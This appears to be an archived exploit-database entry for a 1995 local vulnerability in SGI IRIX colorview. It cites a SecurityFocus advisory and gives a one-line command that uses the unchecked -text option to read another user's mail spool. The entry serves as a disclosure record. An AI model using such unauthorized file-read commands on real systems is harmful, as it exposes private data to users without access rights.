SGI IRIX <= 6.0.1 colorview Vulnerability

Dejan Levaja 09.02.1995 Verified
Local Exploits IRIX

Exploit Code

source: http://www.securityfocus.com/bid/336/info

Colorview fails to validate that the user has access to the file supplied to the -text option. As a result, users can view arbitrary files. 

/usr/sbin/colorview -text /var/spool/mail/admin